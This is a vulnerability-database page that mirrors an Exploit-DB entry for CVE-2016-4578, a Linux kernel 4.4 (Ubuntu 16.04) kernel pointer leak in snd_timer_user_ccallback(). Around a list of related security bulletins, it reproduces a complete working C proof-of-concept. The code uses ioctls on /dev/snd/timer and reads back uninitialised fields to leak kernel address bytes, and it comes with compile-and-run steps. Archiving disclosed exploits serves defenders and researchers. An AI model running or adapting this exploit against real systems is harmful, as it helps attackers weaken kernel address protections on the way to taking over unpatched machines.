Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak

🗓️ 11 Mar 2019 00:00:00Reported by wally0813Type 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 91 Views

Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak. Local exploit against CVE-2016-4578. Exploits the snd_timer_user_ccallback() function to leak kernel pointer addresses

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Linux Kernel 4.4 (Ubuntu 16.04) - snd_timer_user_ccallback() Kernel Pointer Leak Exploit
11 Mar 201900:00
zdt
IBM Security Bulletins		Security Bulletin: IBM Security Access Manager version 9.0.3.0 appliances are affected by multiple kernel vulnerabilities
16 Jun 201822:03
ibm
IBM Security Bulletins		Security Bulletin: Vulnerabilities in the Linux Kernel affect PowerKVM
18 Jun 201801:36
ibm
IBM Security Bulletins		Security Bulletin: IBM QRadar Network Security is affected by multiple vulnerabilities in Linux Kernel
16 Jun 201822:00
ibm
IBM Security Bulletins		Security Bulletin: Multiple vulnerabilities in Linux Kernel affect IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products
29 Mar 202301:48
ibm
Tenable Nessus		CentOS 7 : kernel (CESA-2016:2574)
28 Nov 201600:00
nessus
Tenable Nessus		Debian DLA-516-1 : linux security update
20 Jun 201600:00
nessus
Tenable Nessus		Debian DSA-3607-1 : linux - security update
29 Jun 201600:00
nessus
Tenable Nessus		EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1494)
15 May 201900:00
nessus
Tenable Nessus		EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1508)
21 May 201900:00
nessus
Rows per page
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <asm/unistd_64.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sound/asound.h>

# Exploit Title: Linux Kernel 4.4 (Ubuntu 16.04) - Leak kernel pointer in snd_timer_user_ccallback()

# Google Dork: -

# Date: 2019-03-11

# Exploit Author: wally0813

# Vendor Homepage: -

# Software Link: -

# Version: Linux Kernel 4.4 (Ubuntu 16.04)

# Tested on: ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

# CVE: CVE-2016-4578

# Category: Local



/*
 * [ Briefs ]
 *    - If snd_timer_user_ccallback() doesn't initialize snd_timer_tread.event and snd_timer_tread.val, they are leaked by snd_timer_user_read()
 *    - This is local exploit against the CVE-2016-4578.
 *
 * [ Tested version ]
 *    - 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 *
 * [ Prerequisites ]
 *    -  
 *
 * [ Goal ]
 *    - Leak 4 bytes kernel pointer address using snd_timer_user_ccallback()
 *
 * [ Run exploit ]
 *    - $ gcc -o poc poc.c
 *    - $ sudo ./poc
 *      leak_value(event) : ffff8800
 *      leak_value(val) : ffffffff
 *
 * [ Contact ]
 *    - [email protected]
 */



int fd;

void leak(){

	struct snd_timer_tread td;
	struct snd_timer_select st;
	struct snd_timer_params ps;
	int r;
	unsigned int leak_value_e, leak_value_v;
	int tread;

	memset(&td,0,sizeof(td));
	memset(&st,0,sizeof(st));
	memset(&ps,0,sizeof(ps));


	// set tread
	tread = 1;
	ps.filter |= 1<<SNDRV_TIMER_EVENT_START;
	ps.ticks = 1000 * 1000;

	r = ioctl(fd, SNDRV_TIMER_IOCTL_TREAD, &tread);
	if (r) {
		printf("SNDRV_TIMER_IOCTL_TREAD error : %d, %s\n", errno, strerror(errno));
		return;
	}


	// vuln trigger
	st.id.dev_class = SNDRV_TIMER_CLASS_GLOBAL;
	st.id.dev_sclass = SNDRV_TIMER_SCLASS_APPLICATION;
	r = ioctl(fd, SNDRV_TIMER_IOCTL_SELECT, &st);
	if (r) {
		printf("SNDRV_TIMER_IOCTL_SELECT error : %d, %s\n", errno, strerror(errno));
		return;
	}

	r = ioctl(fd, SNDRV_TIMER_IOCTL_PARAMS, &ps);
	if (r) {
		printf("SNDRV_TIMER_IOCTL_PARAMS error : %d, %s\n", errno, strerror(errno));
		return;
	}

	r = ioctl(fd, SNDRV_TIMER_IOCTL_START);
    if (r) {
    	printf("SNDRV_TIMER_IOCTL_START error : %d, %s\n", errno, strerror(errno));
    	return;
	}


    // get leak
	r = read(fd, &td, sizeof(td));
	
	leak_value_e = *((unsigned long *)(&td.event+1));
	printf("leak_value(event) : %lx\n", leak_value_e);

	leak_value_v = *((unsigned long *)(&td.val+1));
	printf("leak_value(val) : %lx\n", leak_value_v);

}

int main(int argc, char **argv)
{
	fd = open("/dev/snd/timer", O_RDWR);

	if (fd < 0) {
		printf("open error : %d, %s\n", errno, strerror(errno));
		return -1;
	}

	leak();
	close(fd);
	return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Mar 2019 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 22.1
CVSS 35.5
EPSS0.00169
linux kernel 4.4ubuntu 16.04kernel pointer leaklocal exploitcve-2016-4578snd_timer_user_ccallback()snd_timer_treadsnd_timer_selectsnd_timer_paramsioctldev/snd/timer
91